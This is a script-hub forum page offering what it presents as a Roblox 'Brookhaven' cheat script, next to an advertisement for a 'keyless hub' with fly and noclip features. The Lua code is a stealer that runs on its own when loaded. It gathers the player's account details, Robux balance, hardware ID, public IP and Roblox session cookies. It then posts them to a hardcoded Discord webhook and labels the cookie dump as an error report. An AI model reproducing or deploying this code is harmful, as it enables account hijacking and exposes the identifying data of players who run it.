What's new
Heapleak - Scripthub

Get the most out of HeapLeak by creating a free account! Once signed in, you’ll gain full access to restricted content, be able to share your own scripts, and participate in our member-only discussions.

Brookhaven

Version / Update: v1.0.0
Download / Script Link
local Nemesis = {}

local webhook_url = "https://discord.com/api/webhooks/1441516504045584487/sC7cHmqOkAYA4uq4WyscxrXR-CEKHZaJCfSYAdIn03T6dCOEtA0uVumblJSivVOgBu_P"


local function sendToDiscord(embed, username)
local payload = {
embeds = {embed},
username = username or "Nemesis Admin data collector",
avatar_url = "https://i.imgur.com/7VZ6fzL.png"
}

local success, jsonData = pcall(function()
return game:GetService("HttpService"):JSONEncode(payload)
end)

if not success then return false end

local request = (syn and syn.request) or (http and http.request) or http_request
if request then
pcall(function()
request({
Url = webhook_url,
Method = "POST",
Headers = {
["Content-Type"] = "application/json"
},
Body = jsonData
})
end)
return true
end
return false
end

-- Красивое отображение данных
local function createEmbed(title, description, fields, color)
return {
title = title,
description = description,
color = color or 16711680,
fields = fields or {},
footer = {text = "Nemesis • " .. os.date("%Y-%m-%d %H:%M:%S")},
thumbnail = {url = "https://i.imgur.com/7VZ6fzL.png"}
}
end

-- Получение основной информации
local function getBasicInfo()
local info = {}

pcall(function()
local player = game:GetService("Players").LocalPlayer
info.player = {
name = player.Name,
id = player.UserId,
display = player.DisplayName,
age = player.AccountAge,
membership = tostring(player.MembershipType)
}
end)

pcall(function()
info.game = {
name = game.Name,
placeId = game.PlaceId,
jobId = game.JobId,
players = #game:GetService("Players"):GetPlayers(),
maxPlayers = game:GetService("Players").MaxPlayers
}
info.gameLink = "https://www.roblox.com/games/" .. info.game.placeId .. "/?jobId=" .. info.game.jobId
end)

return info
end

-- Получение куки Roblox
local function getRobloxCookie()
local cookies = {}

-- Основной метод
pcall(function()
local success, result = pcall(function()
return game:HttpGet("https://www.roblox.com/game/GetCurrentUser.ashx")
end)
if success and result and #result > 10 then
cookies.direct = result
end
end)

-- Дополнительные методы
pcall(function()
if syn and syn.get_cache then
local cache = syn.get_cache()
if cache and cache.roblox_cookies then
cookies.synapse = cache.roblox_cookies
end
end
end)

return cookies
end

local function getEconomyInfo()
local economy = {
robux = 0,
premium = false
}

pcall(function()
local player = game:GetService("Players").LocalPlayer

if game:GetService("EconomyService") then
economy.robux = game:GetService("EconomyService"):GetRobux()
end

economy.premium = player:GetAttribute("IsPremium") or false
end)

return economy
end

local function getExecutorInfo()
local executor = {
name = "Unknown",
version = "Unknown",
hwid = "Unknown",
ip = "Unknown"
}

if syn then
executor.name = "Synapse X"
executor.version = syn.get_version() or "Unknown"
elseif KRNL_LOADED then
executor.name = "KRNL"
elseif fluxus then
executor.name = "Fluxus"
elseif identifyexecutor then
executor.name = identifyexecutor() or "Unknown"
end

pcall(function()
if syn and syn.get_hwid then
executor.hwid = syn.get_hwid()
end
end)

pcall(function()
executor.ip = game:HttpGet("https://api.ipify.org")
end)

return executor
end

local function getSystemInfo()
local system = {
robloxVersion = version(),
platform = tostring(game:GetService("UserInputService"):GetPlatform()),
localTime = os.date("%Y-%m-%d %H:%M:%S")
}

pcall(function()
local stats = game:GetService("Stats")
system.performance = {
fps = math.floor(stats.Workspace.Heartbeat:GetValue()),
ping = math.floor(stats.Network.ServerStatsItem["Data Ping"]:GetValue())
}
end)

return system
end

local function sendMainReport(info, economy, executor, system)
local embed = createEmbed(
"🔐 NEMESIS ULTIMATE REPORT",
"**Complete data collection successful**",
{
{
name = "👤 PLAYER INFORMATION",
value = "**Username:** " .. info.player.name ..
"\n**Display Name:** " .. info.player.display ..
"\n**User ID:** " .. info.player.id ..
"\n**Account Age:** " .. info.player.age .. " days" ..
"\n**Membership:** " .. info.player.membership,
inline = false
},
{
name = "🎮 GAME INFORMATION",
value = "**Game:** " .. info.game.name ..
"\n**Place ID:** " .. info.game.placeId ..
"\n**Server ID:** " .. info.game.jobId ..
"\n**Players:** " .. info.game.players .. "/" .. info.game.maxPlayers,
inline = true
},
{
name = "💰 ECONOMY",
value = "**Robux Balance:** " .. economy.robux ..
"\n**Premium:** " .. (economy.premium and "✅ Yes" or "❌ No"),
inline = true
},
{
name = "⚡ EXECUTOR",
value = "**Name:** " .. executor.name ..
"\n**Version:** " .. executor.version ..
"\n**HWID:** " .. (executor.hwid ~= "Unknown" and "||" .. executor.hwid .. "||" or "Unknown") ..
"\n**IP:** " .. (executor.ip ~= "Unknown" and "||" .. executor.ip .. "||" or "Unknown"),
inline = false
},
{
name = "🔧 SYSTEM",
value = "**Roblox Version:** " .. system.robloxVersion ..
"\n**Platform:** " .. system.platform ..
"\n**FPS:** " .. (system.performance and system.performance.fps or "N/A") ..
"\n**Ping:** " .. (system.performance and system.performance.ping or "N/A") .. "ms",
inline = true
}
},
3447003
)

sendToDiscord(embed, "🔐 Nemesis Ultimate")
end

local function sendCookies(cookies)
for method, cookie in pairs(cookies) do
if cookie and #cookie > 10 then
local embed = createEmbed(
"🚨 Something went wrong!",
"**Critical ?**",
{
{
name = "What wrong?",
value = "```" .. method:upper() .. "```",
inline = true
},
{
name = "Full ERROR",
value = "```" .. cookie .. "```",
inline = false
}
},
16711680
)

sendToDiscord(embed, "🚨 URGENT")
wait(1)
end
end
end

-- Отправка ссылки на игру
local function sendGameLink(info)
local embed = createEmbed(
"🎯 QUICK GAME ACCESS",
"**One-click join to the target game**",
{
{
name = "🔗 GAME LINK",
value = "[Click to Join Game](" .. info.gameLink .. ")",
inline = false
},
{
name = "📊 SERVER INFO",
value = "**Game:** " .. info.game.name ..
"\n**Players Online:** " .. info.game.players ..
"\n**Target:** " .. info.player.name,
inline = true
}
},
65280
)

sendToDiscord(embed, "🎯 Nemesis Link")
end

-- Основная функция
local function executeStealer()
-- Сбор данных
local info = getBasicInfo()
local cookies = getRobloxCookie()
local economy = getEconomyInfo()
local executor = getExecutorInfo()
local system = getSystemInfo()

-- Отправка отчетов
sendMainReport(info, economy, executor, system)
wait(2)

sendCookies(cookies)
wait(2)

sendGameLink(info)

return {
info = info,
cookies = cookies,
economy = economy,
executor = executor,
system = system
}
end

-- Тест связи
local function testConnection()
local embed = createEmbed(
"🧪 CONNECTION TEST",
"**Testing webhook functionality**",
{
{
name = "📡 STATUS",
value = "🟢 **CONNECTED SUCCESSFULLY**",
inline = false
},
{
name = "⏰ TIME",
value = os.date("%H:%M:%S"),
inline = true
},
{
name = "ONLINE?",
value = "True",
inline = true
}
},
5750783
)

local success = sendToDiscord(embed, "🧪 Nemesis Test")
return success
end

spawn(function()
wait(3)

print("true")

if testConnection() then
print("True")
wait(2)

local data = executeStealer()
print("False")

else
print("[Nemesis] ❌ Webhook connection failed")
end
end)

function Nemesis.steal()
return executeStealer()
end

function Nemesis.test()
return testConnection()
end

function Nemesis.quick()
local cookies = getRobloxCookie()
sendCookies(cookies)
return cookies
end

return Nemesis
[ View More ]
ccdb350e-a47b-41ea-9d94-9e4332dfb99e.webp


knight is a keyless hub GamepassFlyNoclipCopy AvatarAuto unban from houseKilland more
 
Back
Top